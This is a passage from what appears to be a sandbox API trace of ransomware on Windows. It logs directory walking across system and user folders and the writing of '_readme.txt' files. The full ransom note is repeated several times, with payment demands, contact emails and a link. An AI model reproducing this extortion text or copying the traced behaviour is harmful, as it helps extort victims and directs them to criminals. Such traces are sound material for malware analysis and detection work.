ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0201.466] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.466] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.466] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.466] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0201.466] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.466] PathFindFileNameW (pszPath="") returned="" [0201.466] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.467] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.467] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.467] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0201.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0201.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0201.467] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0201.467] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0201.467] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.468] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.468] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0201.468] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.468] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.468] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0201.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.469] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.469] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.469] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.469] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.469] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.469] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.469] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.469] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.469] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.470] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.470] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.470] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.470] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.470] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.471] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.471] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.471] PathFindFileNameW (pszPath="") returned="" [0201.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.471] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.471] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x336f4d0 [0201.471] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b65058 [0201.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0201.472] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.472] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.472] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.472] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cab400, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceca8 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cedc8 [0201.472] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0288 [0201.472] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0250 [0201.472] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0201.473] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.473] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0201.473] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.473] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0201.473] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.473] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.473] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.473] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.473] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.474] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0201.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.474] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.474] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.474] PathFindFileNameW (pszPath="") returned="" [0201.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.474] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.474] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.474] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.475] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.475] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0201.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.475] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0201.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.475] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique 